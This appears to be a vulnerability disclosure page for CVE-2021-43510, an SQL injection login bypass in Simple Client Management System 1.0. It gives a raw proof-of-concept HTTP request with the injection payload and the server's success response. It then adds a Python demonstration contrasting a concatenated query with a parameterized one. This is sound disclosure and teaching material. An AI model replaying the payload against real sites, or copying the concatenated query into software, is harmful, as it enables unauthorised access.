CVE-2021-43510: Simple-Client-Management-System-Exploit/CVE-2021-43510 at main · r4hn1/Simple-Client-Management-System-Exploit
An SQL injection vulnerability exists in Sourcecodester Simple Client Management System 1.0 via the username field in login.php.
# Exploit Title: Simple Client Management System 1.0 - SQL injection (Authentication Bypass)
# Date: 27/01/2022
# Exploit Author: Rahul Kalnarayan (r4hn1)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html
# Version: 1.0
# Category: Webapps
# Tested on: Apache2+MariaDB latest version
# Description: Simple Client Management System 1.0 suffers from an SQL injection vulnerability that allows an unauthenticated user to log in to the admin panel.
# CVE ID: CVE-2021-43510
Vulnerable Page: /crm/admin/
POC-Request
-----------------------------------
POST /cms/classes/Login.php?f=login HTTP/1.1
Host: 192.168.1.76
Content-Length: 31
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.76
Referer: http://192.168.1.76/cms/admin/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

username=admin'+or+'1'%3d'1'--+-&password=as
---------------------------------------
POC-Response
HTTP/1.1 200 OK
Date: Thu, 27 Jan 2022 17:29:08 GMT
Server: Apache/2.4.38 (Debian)
Set-Cookie: PHPSESSID=1s27q3saavhi3jc8lndng66tlt; path=/; secure
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

{"status":"success"}
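
Added example, not part of the original PoC and not the application's own code: it decodes the request body shown above (quotes and comment terminator written in plain ASCII) and runs it against a string-concatenated login query and a parameterized one. The table schema, the query shape, the password hashing and the use of in-memory SQLite in place of MariaDB are assumptions made for illustration.

```python
import hashlib
import sqlite3
from urllib.parse import parse_qs

# Form-encoded body from the PoC request; "+" decodes to a space, "%3d" to "=".
POC_BODY = "username=admin'+or+'1'%3d'1'--+-&password=as"

def make_db():
    """Constructed stand-in for the application's users table (assumed schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # The hash is only a placeholder; the example is about query construction.
    db.execute("INSERT INTO users (username, password) VALUES (?, ?)",
               ("admin", hashlib.sha256(b"constructed-admin-pw").hexdigest()))
    return db

def login_concatenated(db, username, password):
    """Vulnerable pattern: request values are pasted into the SQL text."""
    pw = hashlib.sha256(password.encode()).hexdigest()
    sql = ("SELECT id FROM users WHERE username = '" + username +
           "' AND password = '" + pw + "'")
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, username, password):
    """Hardened pattern: values are bound, so quotes in them remain data."""
    pw = hashlib.sha256(password.encode()).hexdigest()
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, pw)).fetchone() is not None

def replay(body=POC_BODY):
    """Decode the form body and evaluate it against both login variants."""
    form = parse_qs(body)
    user, pw = form["username"][0], form["password"][0]
    db = make_db()
    return {
        "decoded_username": user,
        "concatenated": login_concatenated(db, user, pw),
        "parameterized": login_parameterized(db, user, pw),
        "legit_parameterized": login_parameterized(db, "admin", "constructed-admin-pw"),
    }

if __name__ == "__main__":
    for key, value in replay().items():
        print(f"{key}: {value}")
```

With the concatenated query the password condition ends up behind the SQL comment and the login succeeds; with bound parameters the same input is compared as a literal username and is rejected, while the real credentials still work.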